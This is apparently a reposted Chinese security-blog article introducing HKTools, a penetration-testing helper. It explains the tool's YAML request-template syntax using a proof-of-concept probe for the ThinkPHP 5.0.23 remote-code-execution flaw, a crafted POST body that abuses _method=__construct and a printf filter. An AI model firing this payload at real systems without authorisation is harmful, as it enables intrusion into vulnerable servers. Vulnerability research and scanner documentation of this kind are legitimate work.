0x01 简介
一款辅助安全研发在日常工作中渗透测试、安全研究、安全开发等工作的工具! 程序支持Yaml格式的http请求模版
启动密码:
GMYTGMRTGMZDCNBQGIZ6PHEL42QLPZNNSDSYHD7IX6N6LCFW466JNZ5AQHSZHJXPXSAQ====
基础语法
漏洞名称,必须为英文.
name: poc-yaml-thinkphp5023-method-rce
内置函数
set:
randomInt: 0,1
md5: 'admin'
发包配置
rules:
r1:
method: "POST"
path: "/index.php?s=captcha"
headers:
Content-Type: application/x-www-form-urlencoded
body: "_method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]={{md5}}&get[]=1"
expression:
responsestatus: 200
responsebody: '{{md5}}'
r2:
method: "GET"
path: "/{{md5}}"
expression:
responsestatus: 404
responsebody: '{{md5}}'
- r1:自定义请求函数名,从上到下依次执行请求函数
- method:必须由单引号或双引号闭合,请求方式,当前支持POST、GET、PUT
- path:必须由单引号或双引号闭合,请求路径
- headers:可不写此项(直接删除,参考r2),一行一条,冒号左侧为键名,冒号右侧为键值
- body:必须由单引号或双引号闭合,可不写此项(直接删除,参考r2),在GET请求中不应填写
- responsestatus:不可存在单引号或双引号,必须填写,判断响应状态码
- responsebody:必须由单引号或双引号闭合,必须填写,在响应正文中查找指定字符串
脚本信息
info:
author: Explang
Homepage: https://github.com/ExpLangcn
CodeLink:
- https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
- author:POC作者名称,不可为空,必须为英文
-
Homepage:个人主页链接
- CodeLink:漏洞参考链接,一行一个
0x03 截图介绍
正则匹配
加密解密
http调试
http多个模版请求(支持批量请求多个模版,支持请求多次)
0x04 下载方式
原文始发于微信公众号(寻云安全团队):【HKTools】一款辅助安全研发在日常工作中渗透测试、安全研究、安全开发等工作的工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论